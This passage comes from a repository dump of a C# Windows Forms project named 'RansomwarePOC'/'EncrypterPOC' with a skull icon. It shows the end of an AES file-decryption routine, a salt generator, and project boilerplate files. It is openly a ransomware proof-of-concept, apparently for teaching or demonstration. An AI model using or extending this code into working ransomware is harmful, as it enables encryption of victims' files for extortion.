217 |             CryptoStream cryptoStream = new CryptoStream(cryptoFileStream, AES.CreateDecryptor(), CryptoStreamMode.Read);
218 | 
219 |             FileStream fileStreamOutput = new FileStream(outputFile, FileMode.Create);
220 | 
221 |             int read;
222 |             byte[] buffer = new byte[1048576];
223 | 
224 |             try
225 |             {
226 |                 while ((read = cryptoStream.Read(buffer, 0, buffer.Length)) > 0)
227 |                 {
228 |                     //Application.DoEvents();
229 |                     fileStreamOutput.Write(buffer, 0, read);
230 |                 }
231 |             }
232 |             catch (CryptographicException ex_CryptographicException)
233 |             {
234 |                 Console.WriteLine("CryptographicException error: " + ex_CryptographicException.Message);
235 |             }
236 |             catch (Exception ex)
237 |             {
238 |                 Console.WriteLine("Error: " + ex.Message);
239 |             }
240 | 
241 |             try
242 |             {
243 |                 cryptoStream.Close();
244 |             }
245 |             catch (Exception ex)
246 |             {
247 |                 Console.WriteLine("Error by closing CryptoStream: " + ex.Message);
248 |             }
249 |             finally
250 |             {
251 |                 fileStreamOutput.Close();
252 |                 cryptoFileStream.Close();
253 |             }
254 |         }
255 | 
256 |         public static byte[] GenerateRandomSalt()
257 |         {
258 |             byte[] data = new byte[32];
259 | 
260 |             using (RNGCryptoServiceProvider rng = new RNGCryptoServiceProvider())
261 |             {
262 |                 for (int i = 0; i < 10; i++)
263 |                 {
264 |                     // Fille the buffer with the generated data
265 |                     rng.GetBytes(data);
266 |                 }
267 |             }
268 | 
269 |             return data;
270 |         }
271 |     }
272 | }
273 | 


--------------------------------------------------------------------------------
/WindowsFormsApp1/EncrypterPOC.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{05C139EC-1F59-4BDF-8DEC-1D7100C6E4CC}</ProjectGuid>
 8 |     <OutputType>WinExe</OutputType>
 9 |     <RootNamespace>WindowsFormsApp1</RootNamespace>
10 |     <AssemblyName>WindowsFormsApp1</AssemblyName>
11 |     <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
12 |     <FileAlignment>512</FileAlignment>
13 |     <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
14 |     <Deterministic>true</Deterministic>
15 |   </PropertyGroup>
16 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
17 |     <PlatformTarget>AnyCPU</PlatformTarget>
18 |     <DebugSymbols>true</DebugSymbols>
19 |     <DebugType>full</DebugType>
20 |     <Optimize>false</Optimize>
21 |     <OutputPath>bin\Debug\</OutputPath>
22 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
23 |     <ErrorReport>prompt</ErrorReport>
24 |     <WarningLevel>4</WarningLevel>
25 |   </PropertyGroup>
26 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
27 |     <PlatformTarget>AnyCPU</PlatformTarget>
28 |     <DebugType>pdbonly</DebugType>
29 |     <Optimize>true</Optimize>
30 |     <OutputPath>bin\Release\</OutputPath>
31 |     <DefineConstants>TRACE</DefineConstants>
32 |     <ErrorReport>prompt</ErrorReport>
33 |     <WarningLevel>4</WarningLevel>
34 |   </PropertyGroup>
35 |   <PropertyGroup>
36 |     <ApplicationIcon>skull_rip.ico</ApplicationIcon>
37 |   </PropertyGroup>
38 |   <ItemGroup>
39 |     <Reference Include="System" />
40 |     <Reference Include="System.Core" />
41 |     <Reference Include="System.Xml.Linq" />
42 |     <Reference Include="System.Data.DataSetExtensions" />
43 |     <Reference Include="Microsoft.CSharp" />
44 |     <Reference Include="System.Data" />
45 |     <Reference Include="System.Deployment" />
46 |     <Reference Include="System.Drawing" />
47 |     <Reference Include="System.Net.Http" />
48 |     <Reference Include="System.Windows.Forms" />
49 |     <Reference Include="System.Xml" />
50 |   </ItemGroup>
51 |   <ItemGroup>
52 |     <Compile Include="Encrypter.cs">
53 |       <SubType>Form</SubType>
54 |     </Compile>
55 |     <Compile Include="Encrypter.Designer.cs">
56 |       <DependentUpon>Encrypter.cs</DependentUpon>
57 |     </Compile>
58 |     <Compile Include="Program.cs" />
59 |     <Compile Include="Properties\AssemblyInfo.cs" />
60 |     <EmbeddedResource Include="Encrypter.resx">
61 |       <DependentUpon>Encrypter.cs</DependentUpon>
62 |     </EmbeddedResource>
63 |     <EmbeddedResource Include="Properties\Resources.resx">
64 |       <Generator>ResXFileCodeGenerator</Generator>
65 |       <LastGenOutput>Resources.Designer.cs</LastGenOutput>
66 |       <SubType>Designer</SubType>
67 |     </EmbeddedResource>
68 |     <Compile Include="Properties\Resources.Designer.cs">
69 |       <AutoGen>True</AutoGen>
70 |       <DependentUpon>Resources.resx</DependentUpon>
71 |     </Compile>
72 |     <None Include="Properties\Settings.settings">
73 |       <Generator>SettingsSingleFileGenerator</Generator>
74 |       <LastGenOutput>Settings.Designer.cs</LastGenOutput>
75 |     </None>
76 |     <Compile Include="Properties\Settings.Designer.cs">
77 |       <AutoGen>True</AutoGen>
78 |       <DependentUpon>Settings.settings</DependentUpon>
79 |       <DesignTimeSharedInput>True</DesignTimeSharedInput>
80 |     </Compile>
81 |   </ItemGroup>
82 |   <ItemGroup>
83 |     <None Include="App.config" />
84 |   </ItemGroup>
85 |   <ItemGroup>
86 |     <Content Include="skull_rip.ico" />
87 |   </ItemGroup>
88 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
89 | </Project>


--------------------------------------------------------------------------------
/WindowsFormsApp1/Program.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.Linq;
 4 | using System.Threading.Tasks;
 5 | using System.Windows.Forms;
 6 | 
 7 | namespace RansomwarePOC
 8 | {
 9 |     static class Program
10 |     {
11 |         /// <summary>
12 |         /// The main entry point for the application.
13 |         /// </summary>
14 |         [STAThread]
15 |         static void Main()
16 |         {
17 |             Application.EnableVisualStyles();
18 |             Application.SetCompatibleTextRenderingDefault(false);
19 |             Application.Run(new Form1());
20 |         }
21 |     }
22 | }
23 | 


--------------------------------------------------------------------------------
/WindowsFormsApp1/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // General Information about an assembly is controlled through the following
 6 | // set of attributes. Change these attribute values to modify the information
 7 | // associated with an assembly.
 8 | [assembly: AssemblyTitle("WindowsFormsApp1")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("WindowsFormsApp1")]
13 | [assembly: AssemblyCopyright("Copyright ©  2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components.  If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 | 
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("05c139ec-1f59-4bdf-8dec-1d7100c6e4cc")]
24 | 
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | //      Major Version
28 | //      Minor Version
29 | //      Build Number
30 | //      Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/WindowsFormsApp1/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
 1 | //------------------------------------------------------------------------------
 2 | // <auto-generated>
 3 | //     This code was generated by a tool.
 4 | //     Runtime Version:4.0.30319.42000
 5 | //
 6 | //     Changes to this file may cause incorrect behavior and will be lost if
 7 | //     the code is regenerated.
 8 | // </auto-generated>
 9 | //------------------------------------------------------------------------------
10 | 
11 | 
12 | namespace RansomwarePOC.Properties
13 | {
14 |     /// <summary>
15 |     ///   A strongly-typed resource class, for looking up localized strings, etc.
16 |     /// </summary>
17 |     // This class was auto-generated by the StronglyTypedResourceBuilder
18 |     // class via a tool like ResGen or Visual Studio.
19 |     // To add or remove a member, edit your .ResX file then rerun ResGen
20 |     // with the /str option, or rebuild your VS project.
21 |     [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
22 |     [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
23 |     [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
24 |     internal class Resources
25 |     {
26 | 
27 |         private static global::System.Resources.ResourceManager resourceMan;
28 | 
29 |         private static global::System.Globalization.CultureInfo resourceCulture;
30 | 
31 |         [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
32 |         internal Resources()
33 |         {
34 |         }
35 | 
36 |         /// <summary>
37 |         ///   Returns the cached ResourceManager instance used by this class.
38 |         /// </summary>
39 |         [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
40 |         internal static global::System.Resources.ResourceManager ResourceManager
41 |         {
42 |             get
43 |             {
44 |                 if ((resourceMan == null))
45 |                 {
46 |                     global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("WindowsFormsApp1.Properties.Resources", typeof(Resources).Assembly);
47 |                     resourceMan = temp;
48 |                 }
49 |                 return resourceMan;
50 |             }
51 |         }
52 | 
53 |         /// <summary>
54 |         ///   Overrides the current thread's CurrentUICulture property for all
55 |         ///   resource lookups using this strongly typed resource class.
56 |         /// </summary>
57 |         [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
58 |         internal static global::System.Globalization.CultureInfo Culture
59 |         {
60 |             get
61 |             {
62 |                 return resourceCulture;
63 |             }
64 |             set
65 |             {
66 |                 resourceCulture = value;
67 |             }
68 |         }
69 |     }
70 | }
71 | 


--------------------------------------------------------------------------------
/WindowsFormsApp1/Properties/Resources.resx:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <root>
  3 |   <!-- 
  4 |     Microsoft ResX Schema 
  5 |     
  6 |     Version 2.0
  7 |     
  8 |     The primary goals of this format is to allow a simple XML format 
  9 |     that is mostly human readable. The generation and parsing of the 
 10 |     various data types are done through the TypeConverter classes 
 11 |     associated with the data types.
 12 |     
 13 |     Example:
 14 |     
 15 |     ... ado.net/XML headers & schema ...
 16 |     <resheader name="resmimetype">text/microsoft-resx</resheader>
 17 |     <resheader name="version">2.0</resheader>
 18 |     <resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
 19 |     <resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
 20 |     <data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
 21 |     <data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
 22 |     <data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
 23 |         <value>[base64 mime encoded serialized .NET Framework object]</value>
 24 |     </data>
 25 |     <data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
 26 |         <value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
 27 |         <comment>This is a comment</comment>
 28 |     </data>
 29 |                 
 30 |     There are any number of "resheader" rows that contain simple 
 31 |     name/value pairs.
 32 |     
 33 |     Each data row contains a name, and value. The row also contains a 
 34 |     type or mimetype. Type corresponds to a .NET class that support 
 35 |     text/value conversion through the TypeConverter architecture. 
 36 |     Classes that don't support this are serialized and stored with the 
 37 |     mimetype set.
 38 |     
 39 |     The mimetype is used for serialized objects, and tells the 
 40 |     ResXResourceReader how to depersist the object. This is currently not 
 41 |     extensible. For a given mimetype the value must be set accordingly:
 42 |     
 43 |     Note - application/x-microsoft.net.object.binary.base64 is the format 
 44 |     that the ResXResourceWriter will generate, however the reader can 
 45 |     read any of the formats listed below.
 46 |     
 47 |     mimetype: application/x-microsoft.net.object.binary.base64
 48 |     value   : The object must be serialized with 
 49 |             : System.Serialization.Formatters.Binary.BinaryFormatter
 50 |             : and then encoded with base64 encoding.
 51 |     
 52 |     mimetype: application/x-microsoft.net.object.soap.base64
 53 |     value   : The object must be serialized with 
 54 |             : System.Runtime.Serialization.Formatters.Soap.SoapFormatter
 55 |             : and then encoded with base64 encoding.
 56 | 
 57 |     mimetype: application/x-microsoft.net.object.bytearray.base64
 58 |     value   : The object must be serialized into a byte array 
 59 |             : using a System.ComponentModel.TypeConverter
 60 |             : and then encoded with base64 encoding.
 61 |     -->
 62 |   <xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
 63 |     <xsd:element name="root" msdata:IsDataSet="true">
 64 |       <xsd:complexType>
 65 |         <xsd:choice maxOccurs="unbounded">
 66 |           <xsd:element name="metadata">
 67 |             <xsd:complexType>
 68 |               <xsd:sequence>
 69 |                 <xsd:element name="value" type="xsd:string" minOccurs="0" />
 70 |               </xsd:sequence>
 71 |               <xsd:attribute name="name" type="xsd:string" />
 72 |               <xsd:attribute name="type" type="xsd:string" />
 73 |               <xsd:attribute name="mimetype" type="xsd:string" />
 74 |             </xsd:complexType>
 75 |           </xsd:element>
 76 |           <xsd:element name="assembly">
 77 |             <xsd:complexType>
 78 |               <xsd:attribute name="alias" type="xsd:string" />
 79 |               <xsd:attribute name="name" type="xsd:string" />
 80 |             </xsd:complexType>
 81 |           </xsd:element>
 82 |           <xsd:element name="data">
 83 |             <xsd:complexType>
 84 |               <xsd:sequence>
 85 |                 <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
 86 |                 <xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
 87 |               </xsd:sequence>
 88 |               <xsd:attribute name="name" type="xsd:string" msdata:Ordinal="1" />
 89 |               <xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
 90 |               <xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
 91 |             </xsd:complexType>
 92 |           </xsd:element>
 93 |           <xsd:element name="resheader">
 94 |             <xsd:complexType>
 95 |               <xsd:sequence>
 96 |                 <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
 97 |               </xsd:sequence>
 98 |               <xsd:attribute name="name" type="xsd:string" use="required" />
 99 |             </xsd:complexType>
100 |           </xsd:element>
101 |         </xsd:choice>
102 |       </xsd:complexType>
103 |     </xsd:element>
104 |   </xsd:schema>
105 |   <resheader name="resmimetype">
106 |     <value>text/microsoft-resx</value>
107 |   </resheader>
108 |   <resheader name="version">
109 |     <value>2.0</value>
110 |   </resheader>
111 |   <resheader name="reader">
112 |     <value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
113 |   </resheader>
114 |   <resheader name="writer">
115 |     <value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
116 |   </resheader>
117 | </root>


--------------------------------------------------------------------------------
/WindowsFormsApp1/Properties/Settings.Designer.cs:
--------------------------------------------------------------------------------
 1 | //------------------------------------------------------------------------------
 2 | // <auto-generated>
 3 | //     This code was generated by a tool.
 4 | //     Runtime Version:4.0.30319.42000
 5 | //
 6 | //     Changes to this file may cause incorrect behavior and will be lost if
 7 | //     the code is regenerated.
 8 | // </auto-generated>
 9 | //------------------------------------------------------------------------------
10 | 
11 | 
12 | namespace RansomwarePOC.Properties
13 | {
14 |     [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
15 |     [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")]
16 |     internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase
17 |     {
18 | 
19 |         private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
20 | 
21 |         public static Settings Default
22 |         {
23 |             get
24 |             {
25 |                 return defaultInstance;
26 |             }
27 |         }
28 |     }
29 | }
30 | 


--------------------------------------------------------------------------------
/WindowsFormsApp1/Properties/Settings.settings:
--------------------------------------------------------------------------------
1 | <?xml version='1.0' encoding='utf-8'?>
2 | <SettingsFile xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings" CurrentProfile="(Default)">
3 |   <Profiles>
4 |     <Profile Name="(Default)" />
5 |   </Profiles>
6 |   <Settings />
7 | </SettingsFile>
8 | 


--------------------------------------------------------------------------------
/WindowsFormsApp1/images/skull_rip.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/joshmadakor1/EncrypterPOC/ac8b8c69eb82f494b9e4fb8b37316d42bd4d488c/WindowsFormsApp1/images/skull_rip.ico


--------------------------------------------------------------------------------
/WindowsFormsApp1/images/skull_rip.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/joshmadakor1/EncrypterPOC/ac8b8c69eb82f494b9e4fb8b37316d42bd4d488c/WindowsFormsApp1/images/skull_rip.png


--------------------------------------------------------------------------------
/WindowsFormsApp1/skull_rip.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/joshmadakor1/EncrypterPOC/ac8b8c69eb82f494b9e4fb8b37316d42bd4d488c/WindowsFormsApp1/skull_rip.ico


--------------------------------------------------------------------------------